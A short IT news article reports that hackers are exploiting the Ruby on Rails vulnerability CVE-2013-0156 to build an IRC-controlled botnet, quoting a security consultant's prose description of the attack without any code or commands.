Ruby on Rails flaw used to create botnet

A critical vulnerability in the Web application development framework Ruby on Rails is being exploited by hackers to compromise servers and build a botnet.

The vulnerability, known as CVE-2013-0156 was the subject of patch released by the Ruby on rails development team several months ago, according to Jeff Jamoc, security consultant with security research company Matasano Security.

“This vulnerability was the subject of much discussion, and an emergency RoR advisory back in January,” he said in his blog. “It’s pretty surprising that it’s taken this long to surface in the wild, but less surprising that people are still running vulnerable installations of Rails.

The exploit, he said, adds a scheduled task on Linux machines that executes a series of commands.


Ruby 2.0.0 released
WordPress hit by botnet

The commands download a malicious C source file from a remote server. The malware connects to an Internet Relay Chat server and connects to a channel where it receives commands from the attackers.

Jamoc described the exploits as a “pretty straightforward skiddy exploit.”

“Functionality is limited, but it includes the ability to download and execute files as commanded, as well as changing servers,” he said. “There’s no authentication performed, so an enterprising individual could hijack these bots fairly easily by joining the IRC server and issuing the appropriate commands.”

Read the full text of Jeff Jamoc’s post here

Would you recommend this article?


Thanks for taking the time to let us know what you think of this article!
We'd love to hear your opinion about this or any other story you read in our publication.

Jim Love, Chief Content Officer, IT World Canada

Featured Download

Featured Article

ADaPT connects employers with highly skilled young workers

Help wanted. That’s what many tech companies across Canada are saying, and research shows that as the demand for skilled workers...

Related Tech News

Tech Jobs

Our experienced team of journalists and bloggers bring you engaging in-depth interviews, videos and content targeted to IT professionals and line-of-business executives.

Tech Companies Hiring Right Now